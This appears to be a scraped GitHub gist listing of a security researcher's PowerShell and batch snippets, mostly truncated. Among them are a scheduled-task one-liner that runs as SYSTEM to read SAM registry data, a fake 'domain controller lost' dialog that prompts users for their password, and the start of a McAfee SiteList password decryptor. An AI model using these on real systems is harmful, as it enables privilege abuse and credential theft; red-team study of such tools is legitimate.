Skip to content

Instantly share code, notes, and snippets.

Avatar
💭
geeking out about Kerberos

Will HarmJ0y

💭
geeking out about Kerberos
View GitHub Profile
@HarmJ0y
HarmJ0y / findsid.bat
Last active Aug 29, 2015
Win7 Powershell SID Enumeration
View findsid.bat
schtasks /create /tn GetSid /tr "powershell.exe -c '$k=Get-Item HKLM:\security\sam\domains\account;$v=Get-ItemProperty $k.pspath;New-Object System.Security.Principal.SecurityIdentifier([Byte[]]$v.V[-24..-1],0)|Format-List *|Out-File c:\sid.txt'" /sc minute /ru System /MO 1 & choice /C X /T 60 /D X > nul & schtasks /delete /tn GetSid /f
@HarmJ0y
HarmJ0y / gist:57f1dac93fcc3564f9b3
Created Oct 23, 2014
domain user to sid and sid to user
View gist:57f1dac93fcc3564f9b3
# user to SID
(New-Object System.Security.Principal.NTAccount("DOMAIN","USER")).Translate([System.Security.Principal.SecurityIdentifier]).Value
# SID to user
(New-Object System.Security.Principal.SecurityIdentifier("SID")).Translate( [System.Security.Principal.NTAccount]).Value
@HarmJ0y
HarmJ0y / trusts.csv
Created Dec 29, 2014
Simple Domain Trust Output
View trusts.csv
SourceDomain TargetDomain TrustType TrustDirection
finance.mothership.com mothership.com ParentChild Bidirectional
mothership.com corp.mothership.com ParentChild Bidirectional
mothership.com finance.mothership.com ParentChild Bidirectional
mothership.com engineering.mothership.com ParentChild Bidirectional
corp.mothership.com mothership.com ParentChild Bidirectional
corp.mothership.com subsidiary.com External Inbound
finance.mothership.com mothership.com ParentChild Bidirectional
engineering.mothership.com mothership.com ParentChild Bidirectional
subsidiary.com product.subsidiary.com ParentChild Bidirectional
@HarmJ0y
HarmJ0y / trusts_complex.csv
Created Dec 29, 2014
More Complex Domain Trust Example
View trusts_complex.csv
SourceDomain TargetDomain TrustType TrustDirection
finance.mothership.com mothership.com ParentChild Bidirectional
mothership.com corp.mothership.com ParentChild Bidirectional
mothership.com finance.mothership.com ParentChild Bidirectional
mothership.com contracts.mothership.com ParentChild Bidirectional
corp.mothership.com mothership.com ParentChild Bidirectional
contracts.mothership.com mothership.com ParentChild Bidirectional
contracts.mothership.com product.othercompany.com External Inbound
product.othercompany.com contracts.mothership.com External Outbound
product.othercompany.com othercompany.com ParentChild Bidirectional
@HarmJ0y
HarmJ0y / streams.ps1
Last active Aug 29, 2015
streams.ps1
View streams.ps1
# these functions all you to enumerate, add, and remove alternate data streams
# it can function as a bootleg replacement for Sysinternals' streams.exe
function Find-Streams {
<#
.SYNOPSIS
Enumerates all alternate data streams for a specified path.
If no path is provided, the current path is used.
Author: @harmj0y
License: BSD 3-Clause
View gist:0f847818b14f745b474d
### Keybase proof
I hereby claim:
* I am harmj0y on github.
* I am harmj0y (https://keybase.io/harmj0y) on keybase.
* I have a public key whose fingerprint is FFD5 77A3 2B3A 2B41 11F4 383A FA2F 9AA5 3110 89D3
To claim this, I am signing this object:
View Invoke-LockWorkStation.ps1
Function Invoke-LockWorkStation {
# region define P/Invoke types dynamically
# stolen from PowerSploit https://github.com/mattifestation/PowerSploit/blob/master/Mayhem/Mayhem.psm1
# thanks matt and chris :)
$DynAssembly = New-Object System.Reflection.AssemblyName('Win32')
$AssemblyBuilder = [AppDomain]::CurrentDomain.DefineDynamicAssembly($DynAssembly, [Reflection.Emit.AssemblyBuilderAccess]::Run)
$ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('Win32', $False)
$TypeBuilder = $ModuleBuilder.DefineType('Win32.User32', 'Public, Class')
$DllImportConstructor = [Runtime.InteropServices.DllImportAttribute].GetConstructor(@([String]))
View Translate-Canonical.ps1
function Translate-Canonical {
<#
.SYNOPSIS
Converts a user@fqdn to NT4 format.
.LINK
http://windowsitpro.com/active-directory/translating-active-directory-object-names-between-formats
#>
[CmdletBinding()]
param(
[String]$User
View prompt.ps1
# Stolen/adapted from http://blog.logrhythm.com/security/do-you-trust-your-computer/
# POC from greg.foss[at]owasp.org
function prompt {
Add-Type -AssemblyName Microsoft.VisualBasic
[Microsoft.VisualBasic.Interaction]::MsgBox('Lost contact with the Domain Controller.', 'OKOnly,MsgBoxSetForeground,SystemModal,Critical', 'ERROR - 0xA801B720')
$c=[System.Security.Principal.WindowsIdentity]::GetCurrent().name
$credential = $host.ui.PromptForCredential("Credentials Required", "Please enter your user name and password.", $c, "NetBiosUserName")
@HarmJ0y
HarmJ0y / Get-DecryptedSitelistPassword.ps1
Created Feb 12, 2016
Get-DecryptedSitelistPassword.ps1
View Get-DecryptedSitelistPassword.ps1
function Get-DecryptedSitelistPassword {
# PowerShell adaptation of https://github.com/funoverip/mcafee-sitelist-pwd-decryption/
# Original Author: Jerome Nokin (@funoverip / jerome.nokin@gmail.com)
# port by @harmj0y
[CmdletBinding()]
Param (
[Parameter(Mandatory = $True)]
[String]
$B64Pass
)
You can’t perform that action at this time.